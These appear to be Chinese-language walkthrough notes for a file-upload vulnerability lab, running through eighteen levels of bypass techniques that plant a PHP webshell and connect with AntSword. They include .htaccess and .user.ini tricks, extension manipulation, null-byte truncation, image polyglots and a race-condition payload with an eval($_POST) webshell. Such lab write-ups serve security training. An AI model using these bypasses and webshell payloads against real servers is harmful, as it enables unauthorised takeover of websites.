一。
1.将一个php文件重命名为jpg文件
2.将这个jpg文件上传然后抓包吧jpg改成php接着放行
3.鼠标右键图片在新建标签页打开图片后去蚁剑连接
二
1.上传jpg文件然后抓包把jpg改成php放行
2.图片右键新建标签页打开图片,复制图片地址去蚁剑连接
三
1.文件重命名为1.php5
2.
上传1.php5文件,图片右键新建标签页打开图片,复制图片地址去蚁剑连接
四。
1.创建一个.htaccess文件,里面输入内容
<FilesMatch "1.jpg">
SetHandler application/x-httpd-php</FilesMatch>
2.先上传.htaccess文件,再上传1.jpg,图片右键新建标签页打开图片
五
1.创建一个.user.ini文件,输入内容auto_prepend_file = "1.jpg"
2.先上传.user,ini文件,再上传1.jpg,访问http://127.0.0.1/upload/upload/readme.php
六。
1.上传1.php抓包,将1.php改为1.phP,放行
2.新标签页打开
七.
1.上传1.php抓包,将1.php后面加空格,放行
2.图片右键新建标签页打开图片
八
1.上传1.php抓包,将1.php后面加.,放行
2.
九.
1.上传1.php抓包,将1.php后面加::$DATA,放行
2.
十
1.上传1.php文件抓包,1.php后面加.空格. 放行
2.
十一
1.将1.php改为1.pphphp
2.
十二
1.
上传1.php文件抓包,将/upload/后面添加随便一个php文件%00,1.php改为1.jpg 放行
2.图片右键新建标签页打开图片,删掉�/9320240830163621.jpg访问
十三。
1,
上传1.php文件抓包,将/upload/后面添加随便一个php文件加空格,1.php改为1.jpg
2.打开Hex,将6.php后面的空格对应的20改为00,放行
3.删掉�/9320240830163621.jpg访问
十四
1.将一张图片和一个php文件放在cmd根目录,运行copy a.jpg/b+2.php/a shell.jpg
2.上传shell.jpg,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址
十五.
1.上传shell.jpg,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址
十六
环境问题跳过
十七
1.图片需要二次渲染,上传图片,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址
十八。
1.php文件输入<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>
2.上传文件,burp抓包,发送到 intruder 模块,设置⽆限发送空的payloads,无限重复;
3.同时攻击,直到出现webshell.php